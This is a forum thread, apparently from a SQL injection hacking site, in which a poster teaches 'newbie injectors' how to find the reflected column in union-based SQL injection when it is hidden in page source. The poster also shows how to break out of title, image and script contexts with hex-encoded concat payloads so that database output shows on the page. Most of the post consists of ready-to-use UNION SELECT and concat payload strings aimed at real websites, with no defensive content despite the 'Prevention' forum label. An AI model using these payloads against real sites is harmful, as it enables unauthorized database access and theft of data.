SQL Injection Forum | Hacking & Exploit Tutorial - SQLiWiki
Solution of vulnerable column not shown on page[SQLI] - Printable Version

+- SQL Injection Forum | Hacking & Exploit Tutorial - SQLiWiki (http://forum.sqliwiki.com)
+-- Forum: SQLi Prevention (http://forum.sqliwiki.com/forumdisplay.php?fid=10)
+--- Forum: SQLi Prevention Tutorial (http://forum.sqliwiki.com/forumdisplay.php?fid=11)
+--- Thread: Solution of vulnerable column not shown on page[SQLI] (/showthread.php?tid=5141)



Solution of vulnerable column not shown on page[SQLI] - Cyber Sidhelchor - 12-24-2017

HI Friends,

Today i will tell you how to get vulnerable column if you don't see on page and how to print your desire queries like your name,version etc etc

I know many newbie injectors face this problem so i post this tutorial

So,lets start

Topic 1 ----> How to get vulnerable column if you dont see on page

Its easy when you dont see vulnerable column on page then might be possible it in SOURCE CODE.
You have to see SOURCE CODE too but with carefully

See---->

union select 1,2,3,4,5-- |-------> No vulnerable column shown

union select 11113,22224,33334,44445,55556-- |------->Now see these numbers in SOURCE CODE.

if you see any above exact numbers in SOURCE CODE then that number is your vulnerable column
Topic 2 -----> How to print your desired queries on webpage

See ---->

when vulnerable columns goes into source code and you want to make them show on webpage.*** there might be many possibilities.******

1) Vuln column might be in title tag.***
if its in title tag.****** like <title>3333</title>
use concat('</title>',version(),'<title>') make the hex code of <title> & </title> if needed.***

2) Vuln column might be in else where in body, like image tag.***
if its in image tag.****** use concat('"/>',version(),'<!--') also use hex if needed.***

3) Vuln column might be in javascript.
suppose vuln column in javascript
var num=3333;
use concat(123,0x3b,0x616c6572742822,version(),0x22293b)

But as i said there might be many possibilities, so everytime you will have to check where vuln column is.***
And always use HEX codes.***

See Again---->

1) concat(0x223e,@@version)
2) concat(0x273e27,version(),0x3c212d2d)
3) concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
4)concat(0x223e,@@version,0x3c696d67207372633d22)
5)concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)

You also can try to NULL the columns like:
UNION+ALL+SELECT+NULL,NULL,NULL,NULL

After that you see NO COLUMNS ON SCREEN but you can then try to put Data in one column like:
UNION+ALL+SELECT+ VERSION() ,NULL,NULL,NULL

If you dont see version (on page or source) try the next column:
UNION+ALL+SELECT+NULL, VERSION() ,NULL,NULL

and so on
you also can fill up all columns and try to see the data:
UNION+ALL+SELECT+ VERSION() ,VERSION() ,VERSION() ,VERSION()

NULLING the columns sometimes help to bring up the data without showing the column number before!

So by using all above queries you can print version,your name etc etc

Hope you like this.